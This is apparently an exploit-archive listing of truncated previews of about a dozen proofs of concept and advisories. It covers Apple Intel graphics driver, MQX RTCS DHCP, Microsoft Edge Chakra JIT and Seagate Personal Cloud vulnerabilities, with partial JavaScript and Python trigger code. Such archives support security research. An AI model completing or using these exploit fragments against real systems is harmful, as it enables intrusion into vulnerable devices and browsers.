/* AppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure input buffer which it uses to index a small array of pointers to memory to copy back to userspace. There is no bounds checking
#!/usr/bin/python3 PoC for MQX RTCS code execution via DHCP options overflow. This is just a quick hack to prove the vulnerability and was designed to run on a private network with the target device. import datetime import socket def main(): Use a de
/** This software is provided by the copyright owner as is and any * expressed or implied warranties, including, but not limited to, * the implied warranties of merchantability and fitness for a particular * purpose are disclaimed. In no event shall
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::
Microsoft Edge: Chakra: JIT: Loop analysis bug CVE-2018-0777Here's the PoC demonstrating OOB write.function opt(arr, start, end) { for (let i = start; i end; i++) { if (i === 10) { i += 0; // -- (a) } arr[i] = 2.3023e-320; }}function main() { let ar
/* If variables don't escape the scope, the variables can be allocated to the stack. However, there are some situations, such as when a bailout happens or accessing to arguments containing stack-allocated variables, where those variables should not e
/* AsmJSByteCodeGenerator::EmitCall which is used to emit call insturctions doesn't check if an array identifier is used as callee. The method handles those invalid calls in the same way it handles valid calls such as arr[idx ...](). In these cases,
// Here's the PoC demonstrating OOB write. function opt(arr, start, end) { for (let i = start; i end; i++) { if (i === 10) { i += 0; // -- (a) } arr[i] = 2.3023e-320; } } function main() { let arr = new Array(100); arr.fill(1.1); for (let i = 0; i 1
/* Since the PoC is only triggerable when the DeferParse flag enabled and requires a with statement, I think this is simillar to issue 1310 . PoC: */ // Enable the flag using 'n'.repeat(0x1000) eval(`(function f() { with ({}) { (function () { print(
// PoC: (function func(arg = function () { print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function. }()) { print(func); function func() { } })(); // Chakra fails to distinguish whether the functi
/* Let's start with comments in the GlobOpt::TrackIntSpecializedAddSubConstant method. // Track bounds for add or sub with a constant. For instance, consider (b = a + 2). The value of 'b' should track // that it is equal to (the value of 'a') + 2. Th
# SSD Advisory Seagate Personal Cloud Multiple Vulnerabilities ## Vulnerabilities summary The following advisory describes two (2) unauthenticated command injection vulnerabilities. Seagate Personal Cloud Home Media Storage is the easiest way to stor
